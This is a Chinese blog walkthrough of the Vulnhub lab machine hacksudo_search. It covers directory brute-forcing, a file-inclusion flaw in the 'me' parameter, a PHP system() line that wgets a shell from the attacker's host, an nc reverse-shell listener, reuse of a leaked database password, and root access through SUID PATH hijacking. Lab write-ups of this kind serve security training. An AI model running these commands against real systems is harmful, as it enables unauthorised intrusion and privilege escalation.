Vulnhub:hacksudo_search

最新推荐文章于 2024-04-30 14:09:25 发布
最新推荐文章于 2024-04-30 14:09:25 发布
阅读量2.4k 收藏
点赞数
分类专栏: web安全 文章标签: 安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/122288823
版权

nmap扫描端口:

https://s4.ax1x.com/2022/01/03/THl5SU.png

💡 开放ssh端口和http端口

浏览器打开80端口:

https://s4.ax1x.com/2022/01/03/THG63V.png

页面只有一个搜索框,输入之后会跳转到搜索页面。

gobuster进行web页面路径爆破:

gobuster dir -e -w C:\Users\Administrator\Desktop\gobuster\dir.txt -u 192.168.0.18 | grep -v "403"

https://s4.ax1x.com/2022/01/03/THlhWT.png

💡 发现search1.php页面

https://s4.ax1x.com/2022/01/03/THloy4.png

gobuster进行参数fuzz:

https://s4.ax1x.com/2022/01/03/THlbwR.png

💡 me参数存在文件包含漏洞

试着读取一下/etc/passwd文件:

https://s4.ax1x.com/2022/01/03/THlTOJ.png

包含shell.php:

使用包含着下载shell.php命令的exec.php执行下载命令,然后反弹。

<?php system('wget http://192.168.0.16:8000/shell.php'); ?>

https://s4.ax1x.com/2022/01/03/THlHm9.png

由于无法上传文件,使用python搭建http服务下载shell.php就能反弹了。

#python快速开启http服务:
pyhton -m http.server 8000
#nc监听端口:
nc -lvvp 1234

先用me参数访问exec.php,等下载好shell.php之再访问,然后就可以用nc连接。

https://s4.ax1x.com/2022/01/03/THlqT1.png

https://s4.ax1x.com/2022/01/03/THlOFx.png

💡 shell.php下载完成,并且已经可以访问。

https://s4.ax1x.com/2022/01/03/THlxSO.png

nc连接成功。

提权:

在/var/www/html下存在.env目录,其中的数据库密码MyD4dSuperH3r0!可以用于hacksudo用户登录。

https://s4.ax1x.com/2022/01/03/THlzlD.png

https://s4.ax1x.com/2022/01/03/TH1S6e.png

💡 hackdo登录成功。

查找SUID文件进行提权:

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

https://s4.ax1x.com/2022/01/03/TH1Cmd.png

home目录下的searchinstall文件具有SUID权限。

https://s4.ax1x.com/2022/01/03/TH1P0A.png

💡 setuid(0)可以用于提权,只要替换一下install命令就可以直接获取root权限

#用bash命令替换install命令并替换环境变量,这样就可以用root权限执行bash命令.
echo "/bin/bash" > /tmp/install
chmod 777 install
export PATH=/tmp:$PATH

https://s4.ax1x.com/2022/01/03/TH1kkt.png

💡 提权成功

root.txt:

https://s4.ax1x.com/2022/01/03/TH1iTI.png

note.txt:

https://s4.ax1x.com/2022/01/03/TH1AtP.png

mysql登录一下:

https://s4.ax1x.com/2022/01/03/TH1Eff.png

search1.php

https://s4.ax1x.com/2022/01/03/TH1e1S.png

Vulnhub:hackdo_search下载链接:

https://www.vulnhub.com/entry/hacksudo-search,683/

gobuster链接:

https://github.com/OJ/gobuster

lionwerson
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 960
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
vulnhubhacksudo search
qwweggfe的博客
08-16 324
kali:192.168.181.129 靶机: 192.168.181.152 信息收集: 首先进行ip扫描 打开网页进行查看 于是对目录进行扫描 我在浏览的过程中发现/search1.php这个目录下,我先他好像有文件包含漏洞 http://192.168.181.152/search1.php?me=/etc/passwd 将M改为m可以远程执行命令 webshell上传 首先在kali开启web服务 python3 http.server 888...
Vulnhub靶机:hacksudo-search
qq_48904485的博客
02-10 1148
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-search(10.0.2.50)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo-search.zip。
HACKSUDO_SEARCH靶机详解
weixin_44681307的博客
07-10 173
这个目录其实才是我们正常的一个主页面,在Contact这个页面看到FUZZ,这是个很明显的提示,就是告诉我们这里有个文件包含漏洞,在About页面发现是个me,我也没扫描,直接用me尝试了一下,发现包含页面就是me。这时候就想到了利用环境变量提权,因为原本的install是/usr/bin目录下的install,我们自己伪造一个,让系统执行我们伪造的,并且又是root权限执行,这样我们就拿到了root权限。这个靶场直接是有ip的,然后单独对这个ip做了个扫描,发现并没有什么可用的。
vulnhubhacksudo FOG
qwweggfe的博客
08-05 265
1、信息搜集: 查看IP地址 查看端口并进行分析 查看是否有漏洞没有发现 打开网页 查看你源码发现在index.php的文件 caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!> 2、webshell 给我两个信息 一个是用户 一个是工具 同时对网页进行探测 在进行默认的dirb的检测 爆出好多目录,发现dict.txt文档 于是将其下载到本地 进行密码破解 进...
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
vulnhub:本地搜索NVD
05-09
Vulnhub __ __ _ _ _ _ \ \ / / | | | | | | | | \ \ / /_ _ | | _ __ | |__| | _ _ | |__ \ \/ /| | | || || '_ \ | __ || | | || '_ \ \ / | |_| || || | | || | | || |_| || |_) | \/ \__,_||_||_| |_||_|...
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
Go-ffuf-用Go写的快速网络模糊器
08-13
允许模糊HTTP标头值,POST数据和URL的不同部分,包括GET参数名称和值
利用gobuster对感兴趣的网站进行域名进行探测
dyx0910的博客
05-09 2006
信息搜集工具 DNS信息搜集 gobuster工具使用 工具介绍:主要面向DNS和web目录进行批量探测 工具介绍:主要面向DNS和web目录进行批量探测 安装:apt-get install gobuster 探测模式:dns、dir、vhost、s3、fuzz dns:用于对目标域名、子域名进行探测-v dir:对web目录进行探测、需要字典 vhost:对于虚拟目录进行探测-x s3:对于存储同链接进行探测-x fuzz:模糊...
gobuster扫描工具使用教程(简单上手)
一个努力学习网安的小牛马
11-25 1804
Gobuster是一个用于网络渗透测试的工具。它主要用于在Web应用程序中发现隐藏的内容或目录枚举,可以扫描子域名以及Web目录,寻找可能存在的漏洞。这个工具使用Go语言编写,具备优异的执行效率和并发性能。
Vulnhub_hacksudo_fog
qq_45434762的博客
05-22 792
主机信息kali: 192.168.1.11 hacksudo_fog: 192.1.12 信息收集使用nmap扫描目标主机IP发现开放以下端口nmap -T4 -A -v -p- 19...
Web安全的最后一道防线:细谈Gobuster的目录/文件/Vhost/DNS子域名暴力破解艺术
最新发布
HUANGXIN9898的博客
04-30 1222
Gobuster是一款用go语言编写的对于网站目录/文件DNS子域虚拟主机vhost模式含义dir最经典的文件路径/目录破解模式。dnsdns子域名破解模式。s3枚举打开S3存储桶并查找存在和存储桶清单(适用于aws)。gcs枚举打开的谷歌云存储桶。vhost虚拟主机枚举模式(不同于dns子域)。fuzz一些基本的模糊处理, 替代 FUZZ 关键字模式。tftp暴力破解tftp文件。近期在某些场景中用到了gobuster,因此不妨趁热打铁写了本文作为沉淀。dirdns。
Gobuster工具详解
B_l_a_nk的博客
12-20 3007
主要介绍gobuster的安装及使用方法,分别介绍各种模式的详细介绍 docker运行gobuster的使用方法
Arp-scan&Nmap&gobuster&wfuzz常用参数
qq_43534481的博客
08-23 562
Arp-scan&Nmap&gobuster&wfuzz用法
打靶总结---部分工具与知识点
qq_61670993的博客
10-22 1574
小菜鸡一枚
GOBUSTER - 目录/文件和DNS爆破工具。
热门推荐
大方子
02-03 3万+
github:https://github.com/OJ/gobuster 常用命令行选项 -fw - 使用通配符结果强制处理域。 -np - 隐藏进度输出。 -m &lt;mode&gt;- 使用哪种模式,dir或者dns(默认:) dir。 -q - 禁用横幅/下划线输出。 -t &lt;threads&gt;- 要运行的线程数(默认值:) 10。 -u &lt;url/dom...
vulnhub靶机——raven: 2
09-03
[vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值